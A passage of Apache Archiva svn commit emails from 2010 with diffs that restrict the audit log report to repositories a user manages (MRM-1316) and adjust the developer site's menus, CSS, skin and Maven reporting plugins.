archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties?rev=905996&r1=905995&r2=905996&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties Wed Feb 3 11:11:06 2010 @@ -77,6 +77,13 @@ ARTIFACTFILEPATH1=test REPOSITORYID1=internal +SNAPSHOT_GROUPID=org.apache.archiva +SNAPSHOT_ARTIFACTID=archiva-test +SNAPSHOT_VERSION=1.0-SNAPSHOT +SNAPSHOT_PACKAGING=jar +SNAPSHOT_ARTIFACTFILEPATH=test +SNAPSHOT_REPOSITORYID=snapshots + # REPOSITORIES # Manage Repositories MANAGED_IDENTIFIER=testing1 Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=905996&r1=905995&r2=905996&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Wed Feb 3 11:11:06 2010 @@ -128,4 +128,40 @@ assertTextPresent( "internal" ); assertTextPresent( "admin" ); } + + @Test (dependsOnMethods = { "testAddArtifactValidValues", "testUserWithRepoManagerInternalRole" }, enabled = false ) + public void testViewAuditLogsViewAuditEventsForManageableRepositoriesOnly() + { + String groupId = getProperty( "SNAPSHOT_GROUPID" ); + String artifactId = getProperty( "SNAPSHOT_ARTIFACTID" ); + String version = getProperty( "SNAPSHOT_VERSION" ); + String repo = getProperty( "SNAPSHOT_REPOSITORYID" ); + String packaging = getProperty( "SNAPSHOT_PACKAGING" ); + + addArtifact( groupId, artifactId, version, packaging, getProperty( "SNAPSHOT_ARTIFACTFILEPATH" ), repo ); + assertTextPresent( "Artifact '" + groupId + ":" + artifactId + ":" + version + + "' was successfully deployed to repository '" + repo + "'" ); + + clickLinkWithText( "Logout" ); + + login( getProperty( "REPOMANAGER_INTERNAL_USERNAME" ), getUserRolePassword() ); + goToAuditLogReports(); + assertAuditLogsReportPage(); + + selectValue( "repository", "all" ); + submit(); + + assertAuditLogsReportPage(); + assertTextPresent( "Results" ); + assertTextNotPresent( "No audit logs found." ); + assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "Uploaded File" ); + assertTextPresent( "internal" ); + assertTextPresent( "admin" ); + + assertTextNotPresent( artifactId + "-" + version + "." + packaging ); + + clickLinkWithText( "Logout" ); + login( getProperty( "ADMIN_USERNAME" ), getProperty( "ADMIN_PASSWORD" ) ); + } } Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java?rev=905996&r1=905995&r2=905996&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Wed Feb 3 11:11:06 2010 @@ -149,7 +149,7 @@ } SimpleConstraint constraint = new MostRecentArchivaAuditLogsConstraint(); - auditLogs = (List<ArchivaAuditLogs>) dao.query( constraint ); + auditLogs = filterLogs( (List<ArchivaAuditLogs>) dao.query( constraint ) ); } public String execute() @@ -216,7 +216,8 @@ try { - auditLogs = auditLogsDao.queryAuditLogs( constraint ); + auditLogs = filterLogs( auditLogsDao.queryAuditLogs( constraint ) ); + if( auditLogs.isEmpty() ) { addActionError( "No audit logs found." ); @@ -244,6 +245,25 @@ return SUCCESS; } + private List<ArchivaAuditLogs> filterLogs( List<ArchivaAuditLogs> auditLogs ) + { + List<String> observableRepos = getManageableRepositories(); + List<ArchivaAuditLogs> filteredAuditLogs = new ArrayList<ArchivaAuditLogs>(); + + if( auditLogs != null ) + { + for( ArchivaAuditLogs auditLog : auditLogs ) + { + if( observableRepos.contains( auditLog.getRepositoryId() ) ) + { + filteredAuditLogs.add( auditLog ); + } + } + } + + return filteredAuditLogs; + } + private void paginate() { if ( auditLogs.size() <= rowCount ) @@ -270,6 +290,27 @@ next = StringUtils.replace( next, " ", "%20" ); } + private List<String> getManageableRepositories() + { + try + { + return userRepositories.getManagableRepositoryIds( getPrincipal() ); + } + catch ( PrincipalNotFoundException e ) + { + log.warn( e.getMessage(), e ); + } + catch ( AccessDeniedException e ) + { + log.warn( e.getMessage(), e ); + } + catch ( ArchivaSecurityException e ) + { + log.warn( e.getMessage(), e ); + } + return Collections.emptyList(); + } + private List<String> getObservableRepositories() { try From [email protected] Wed Feb 03 11:14:55 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77362 invoked from network); 3 Feb 2010 11:14:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Feb 2010 11:14:55 -0000 Received: (qmail 27935 invoked by uid 500); 3 Feb 2010 11:14:55 -0000 Delivered-To: [email protected] Received: (qmail 27883 invoked by uid 500); 3 Feb 2010 11:14:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27874 invoked by uid 99); 3 Feb 2010 11:14:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 11:14:55 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 11:14:52 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 40041238897F; Wed, 3 Feb 2010 11:14:31 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r905998 - in /archiva/branches/archiva-1.3.x/archiva-modules/archiva-web: archiva-webapp-test/src/test/resources/ archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ archiva-webapp/src/main/java/org/apache/maven/archiva/web/act... Date: Wed, 03 Feb 2010 11:14:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: oching Date: Wed Feb 3 11:14:20 2010 New Revision: 905998 URL: http://svn.apache.org/viewvc?rev=905998&view=rev Log: [MRM-1316] audit log report does not restrict events to repositories that you are a manager of merged from trunk -r905996 Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties?rev=905998&r1=905997&r2=905998&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties Wed Feb 3 11:14:20 2010 @@ -77,6 +77,13 @@ ARTIFACTFILEPATH1=test REPOSITORYID1=internal +SNAPSHOT_GROUPID=org.apache.archiva +SNAPSHOT_ARTIFACTID=archiva-test +SNAPSHOT_VERSION=1.0-SNAPSHOT +SNAPSHOT_PACKAGING=jar +SNAPSHOT_ARTIFACTFILEPATH=test +SNAPSHOT_REPOSITORYID=snapshots + # REPOSITORIES # Manage Repositories MANAGED_IDENTIFIER=testing1 Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=905998&r1=905997&r2=905998&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Wed Feb 3 11:14:20 2010 @@ -128,4 +128,40 @@ assertTextPresent( "internal" ); assertTextPresent( "admin" ); } + + @Test (dependsOnMethods = { "testAddArtifactValidValues", "testUserWithRepoManagerInternalRole" }, enabled = false ) + public void testViewAuditLogsViewAuditEventsForManageableRepositoriesOnly() + { + String groupId = getProperty( "SNAPSHOT_GROUPID" ); + String artifactId = getProperty( "SNAPSHOT_ARTIFACTID" ); + String version = getProperty( "SNAPSHOT_VERSION" ); + String repo = getProperty( "SNAPSHOT_REPOSITORYID" ); + String packaging = getProperty( "SNAPSHOT_PACKAGING" ); + + addArtifact( groupId, artifactId, version, packaging, getProperty( "SNAPSHOT_ARTIFACTFILEPATH" ), repo ); + assertTextPresent( "Artifact '" + groupId + ":" + artifactId + ":" + version + + "' was successfully deployed to repository '" + repo + "'" ); + + clickLinkWithText( "Logout" ); + + login( getProperty( "REPOMANAGER_INTERNAL_USERNAME" ), getUserRolePassword() ); + goToAuditLogReports(); + assertAuditLogsReportPage(); + + selectValue( "repository", "all" ); + submit(); + + assertAuditLogsReportPage(); + assertTextPresent( "Results" ); + assertTextNotPresent( "No audit logs found." ); + assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "Uploaded File" ); + assertTextPresent( "internal" ); + assertTextPresent( "admin" ); + + assertTextNotPresent( artifactId + "-" + version + "." + packaging ); + + clickLinkWithText( "Logout" ); + login( getProperty( "ADMIN_USERNAME" ), getProperty( "ADMIN_PASSWORD" ) ); + } } Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java?rev=905998&r1=905997&r2=905998&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Wed Feb 3 11:14:20 2010 @@ -149,7 +149,7 @@ } SimpleConstraint constraint = new MostRecentArchivaAuditLogsConstraint(); - auditLogs = (List<ArchivaAuditLogs>) dao.query( constraint ); + auditLogs = filterLogs( (List<ArchivaAuditLogs>) dao.query( constraint ) ); } public String execute() @@ -216,7 +216,8 @@ try { - auditLogs = auditLogsDao.queryAuditLogs( constraint ); + auditLogs = filterLogs( auditLogsDao.queryAuditLogs( constraint ) ); + if( auditLogs.isEmpty() ) { addActionError( "No audit logs found." ); @@ -244,6 +245,25 @@ return SUCCESS; } + private List<ArchivaAuditLogs> filterLogs( List<ArchivaAuditLogs> auditLogs ) + { + List<String> observableRepos = getManageableRepositories(); + List<ArchivaAuditLogs> filteredAuditLogs = new ArrayList<ArchivaAuditLogs>(); + + if( auditLogs != null ) + { + for( ArchivaAuditLogs auditLog : auditLogs ) + { + if( observableRepos.contains( auditLog.getRepositoryId() ) ) + { + filteredAuditLogs.add( auditLog ); + } + } + } + + return filteredAuditLogs; + } + private void paginate() { if ( auditLogs.size() <= rowCount ) @@ -270,6 +290,27 @@ next = StringUtils.replace( next, " ", "%20" ); } + private List<String> getManageableRepositories() + { + try + { + return userRepositories.getManagableRepositoryIds( getPrincipal() ); + } + catch ( PrincipalNotFoundException e ) + { + log.warn( e.getMessage(), e ); + } + catch ( AccessDeniedException e ) + { + log.warn( e.getMessage(), e ); + } + catch ( ArchivaSecurityException e ) + { + log.warn( e.getMessage(), e ); + } + return Collections.emptyList(); + } + private List<String> getObservableRepositories() { try From [email protected] Thu Feb 11 01:59:59 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42026 invoked from network); 11 Feb 2010 01:59:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2010 01:59:58 -0000 Received: (qmail 76529 invoked by uid 500); 11 Feb 2010 01:59:58 -0000 Delivered-To: [email protected] Received: (qmail 76467 invoked by uid 500); 11 Feb 2010 01:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76458 invoked by uid 99); 11 Feb 2010 01:59:58 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 01:59:58 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 01:59:56 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0A41823889B3; Thu, 11 Feb 2010 01:59:35 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r908791 - in /archiva/branches/MRM-1025/archiva-modules/src/site: apt/ apt/index.apt resources/ site.xml Date: Thu, 11 Feb 2010 01:59:34 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Thu Feb 11 01:59:34 2010 New Revision: 908791 URL: http://svn.apache.org/viewvc?rev=908791&view=rev Log: fix appearance of developer's reference and add a front page Added: archiva/branches/MRM-1025/archiva-modules/src/site/apt/ archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt archiva/branches/MRM-1025/archiva-modules/src/site/resources/ Modified: archiva/branches/MRM-1025/archiva-modules/src/site/site.xml Added: archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt?rev=908791&view=auto ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt (added) +++ archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt Thu Feb 11 01:59:34 2010 @@ -0,0 +1,8 @@ + ---- + Archiva Developer's Documentation + ---- + +Archiva Developer's Documentation + + These documents cover the architecture of Archiva and how to work with it. + Modified: archiva/branches/MRM-1025/archiva-modules/src/site/site.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/site.xml?rev=908791&r1=908790&r2=908791&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/site.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/site.xml Thu Feb 11 01:59:34 2010 @@ -26,6 +26,10 @@ --> </breadcrumbs> + <menu name="Developers"> + <item name="About" href="/index.html" /> + </menu> + <menu ref="modules" /> </body> </project> From [email protected] Thu Feb 11 02:00:38 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42354 invoked from network); 11 Feb 2010 02:00:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2010 02:00:38 -0000 Received: (qmail 76664 invoked by uid 500); 11 Feb 2010 02:00:38 -0000 Delivered-To: [email protected] Received: (qmail 76607 invoked by uid 500); 11 Feb 2010 02:00:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76598 invoked by uid 99); 11 Feb 2010 02:00:38 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 02:00:38 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 02:00:37 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 6113A2388A3B; Thu, 11 Feb 2010 02:00:17 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r908792 - in /archiva/branches/MRM-1025/archiva-modules/src/site/resources/css: ./ site.css Date: Thu, 11 Feb 2010 02:00:17 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Thu Feb 11 02:00:17 2010 New Revision: 908792 URL: http://svn.apache.org/viewvc?rev=908792&view=rev Log: fix appearance of developer's reference (file missed by IDEA commit) Added: archiva/branches/MRM-1025/archiva-modules/src/site/resources/css/ archiva/branches/MRM-1025/archiva-modules/src/site/resources/css/site.css (with props) Added: archiva/branches/MRM-1025/archiva-modules/src/site/resources/css/site.css URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/resources/css/site.css?rev=908792&view=auto ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/resources/css/site.css (added) +++ archiva/branches/MRM-1025/archiva-modules/src/site/resources/css/site.css Thu Feb 11 02:00:17 2010 @@ -0,0 +1,8 @@ +#banner { + background: none; +} + +#banner img { + margin: 10px; +} + Propchange: archiva/branches/MRM-1025/archiva-modules/src/site/resources/css/site.css ------------------------------------------------------------------------------ svn:eol-style = native From [email protected] Thu Feb 11 02:33:15 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54442 invoked from network); 11 Feb 2010 02:33:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2010 02:33:15 -0000 Received: (qmail 97808 invoked by uid 500); 11 Feb 2010 02:33:15 -0000 Delivered-To: [email protected] Received: (qmail 97747 invoked by uid 500); 11 Feb 2010 02:33:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97738 invoked by uid 99); 11 Feb 2010 02:33:14 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 02:33:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 02:33:14 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id DA2D12388A2D; Thu, 11 Feb 2010 02:32:53 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r908808 - in /archiva/branches/MRM-1025/archiva-modules: pom.xml src/site/site.xml Date: Thu, 11 Feb 2010 02:32:53 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Thu Feb 11 02:32:53 2010 New Revision: 908808 URL: http://svn.apache.org/viewvc?rev=908808&view=rev Log: reduce number of reports included Modified: archiva/branches/MRM-1025/archiva-modules/pom.xml archiva/branches/MRM-1025/archiva-modules/src/site/site.xml Modified: archiva/branches/MRM-1025/archiva-modules/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/pom.xml?rev=908808&r1=908807&r2=908808&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/pom.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/pom.xml Thu Feb 11 02:32:53 2010 @@ -36,11 +36,27 @@ </modules> <reporting> <plugins> + <!-- No need for the standard project reports --> + <plugin> + <groupId>org.apache.maven.plugins</groupId> + <artifactId>maven-project-info-reports-plugin</artifactId> + <version>2.0.1</version> + <reportSets> + <reportSet> + <reports> + <report>index</report> + </reports> + </reportSet> + </reportSets> + </plugin> + <!-- Disabled - not working <plugin> <groupId>org.codehaus.mojo</groupId> <artifactId>cobertura-maven-plugin</artifactId> <version>2.2</version> </plugin> + --> + <!-- Disabled - not currently being used to correct errors <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-checkstyle-plugin</artifactId> @@ -48,12 +64,13 @@ <configuration> <includeTestSourceDirectory>true</includeTestSourceDirectory> <configLocation>config/maven_checks.xml</configLocation> - <!-- TODO: enable when archiva-build-resources is active (released?) + <!- - TODO: enable when archiva-build-resources is active (released?) <configLocation>checkstyle.xml</configLocation> <headerLocation>header.txt</headerLocation> - --> + - -> </configuration> </plugin> + --> <!-- TODO: OOME <plugin> <groupId>org.codehaus.mojo</groupId> @@ -63,10 +80,6 @@ --> <plugin> <groupId>org.codehaus.mojo</groupId> - <artifactId>changelog-maven-plugin</artifactId> - </plugin> - <plugin> - <groupId>org.codehaus.mojo</groupId> <artifactId>taglist-maven-plugin</artifactId> </plugin> <plugin> @@ -76,10 +89,6 @@ </configuration> </plugin> <plugin> - <artifactId>maven-surefire-report-plugin</artifactId> - <version>2.4.2</version> - </plugin> - <plugin> <artifactId>maven-javadoc-plugin</artifactId> <version>2.4</version> <configuration> @@ -113,19 +122,30 @@ <link>http://velocity.apache.org/engine/releases/velocity-1.5/apidocs/</link> </links> </configuration> + <reportSets> + <reportSet> + <reports> + <!-- Don't need tests --> + <report>javadoc</report> + </reports> + </reportSet> + </reportSets> </plugin> + <!-- TODO: choose appropriate rulesets <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-pmd-plugin</artifactId> - <!-- TODO: choose appropriate rulesets --> <configuration> <targetJdk>1.5</targetJdk> </configuration> </plugin> + --> + <!-- Not being checked <plugin> <groupId>org.codehaus.mojo</groupId> <artifactId>clirr-maven-plugin</artifactId> </plugin> + --> </plugins> </reporting> <profiles> Modified: archiva/branches/MRM-1025/archiva-modules/src/site/site.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/site.xml?rev=908808&r1=908807&r2=908808&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/site.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/site.xml Thu Feb 11 02:32:53 2010 @@ -26,10 +26,6 @@ --> </breadcrumbs> - <menu name="Developers"> - <item name="About" href="/index.html" /> - </menu> - <menu ref="modules" /> </body> </project> From [email protected] Thu Feb 11 02:53:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61688 invoked from network); 11 Feb 2010 02:53:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2010 02:53:51 -0000 Received: (qmail 11931 invoked by uid 500); 11 Feb 2010 02:53:51 -0000 Delivered-To: [email protected] Received: (qmail 11877 invoked by uid 500); 11 Feb 2010 02:53:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11868 invoked by uid 99); 11 Feb 2010 02:53:50 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 02:53:50 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 02:53:48 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 586A323889CB; Thu, 11 Feb 2010 02:53:27 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r908814 - in /archiva/branches/MRM-1025: ./ archiva-modules/ archiva-modules/src/site/ archiva-modules/src/site/resources/ skin/ skin/src/ skin/src/main/resources/css/ skin/src/main/resources/images/ skin/src/main/resources/images/logos/ sk... Date: Thu, 11 Feb 2010 02:53:27 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Thu Feb 11 02:53:26 2010 New Revision: 908814 URL: http://svn.apache.org/viewvc?rev=908814&view=rev Log: add a skin based on maven-stylus-skin that can be shared among all the module sites Added: archiva/branches/MRM-1025/skin/ (with props) archiva/branches/MRM-1025/skin/pom.xml (with props) archiva/branches/MRM-1025/skin/src/ - copied from r905633, maven/skins/trunk/maven-stylus-skin/src/ Removed: archiva/branches/MRM-1025/archiva-modules/src/site/resources/ archiva/branches/MRM-1025/skin/src/main/resources/images/apache-maven-project-2.png archiva/branches/MRM-1025/skin/src/main/resources/images/banner.jpg archiva/branches/MRM-1025/skin/src/main/resources/images/logo_apache.jpg archiva/branches/MRM-1025/skin/src/main/resources/images/logo_maven.jpg archiva/branches/MRM-1025/skin/src/main/resources/images/logos/build-by-maven-black.png archiva/branches/MRM-1025/skin/src/main/resources/images/logos/build-by-maven-white.png archiva/branches/MRM-1025/skin/src/main/resources/images/maven-logo-2.gif archiva/branches/MRM-1025/skin/src/site/ Modified: archiva/branches/MRM-1025/archiva-modules/pom.xml archiva/branches/MRM-1025/archiva-modules/src/site/site.xml archiva/branches/MRM-1025/pom.xml archiva/branches/MRM-1025/skin/src/main/resources/css/maven-theme.css Modified: archiva/branches/MRM-1025/archiva-modules/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/pom.xml?rev=908814&r1=908813&r2=908814&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/pom.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/pom.xml Thu Feb 11 02:53:26 2010 @@ -34,6 +34,17 @@ <module>metadata</module> <module>plugins</module> </modules> + <build> + <pluginManagement> + <plugins> + <plugin> + <groupId>org.apache.maven.plugins</groupId> + <artifactId>maven-site-plugin</artifactId> + <version>2.1</version> + </plugin> + </plugins> + </pluginManagement> + </build> <reporting> <plugins> <!-- No need for the standard project reports --> Modified: archiva/branches/MRM-1025/archiva-modules/src/site/site.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/site.xml?rev=908814&r1=908813&r2=908814&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/site.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/site.xml Thu Feb 11 02:53:26 2010 @@ -19,6 +19,11 @@ --> <project> + <skin> + <groupId>org.apache.archiva</groupId> + <artifactId>skin</artifactId> + <version>${project.version}</version> + </skin> <body> <breadcrumbs> <!-- TODO: need to stop them inheriting @@ -26,6 +31,9 @@ --> </breadcrumbs> + <menu name="Developers"> + <item name="About" href="/index.html" /> + </menu> <menu ref="modules" /> </body> </project> Modified: archiva/branches/MRM-1025/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/pom.xml?rev=908814&r1=908813&r2=908814&view=diff ============================================================================== --- archiva/branches/MRM-1025/pom.xml (original) +++ archiva/branches/MRM-1025/pom.xml Thu Feb 11 02:53:26 2010 @@ -1,5 +1,4 @@ <?xml version="1.0" encoding="UTF-8"?> - <!-- ~ Licensed to the Apache Software Foundation (ASF) under one ~ or more contributor license agreements. See the NOTICE file @@ -17,9 +16,7 @@ ~ KIND, either express or implied. See the License for the ~ specific language governing permissions and limitations ~ under the License. - --> - -<project 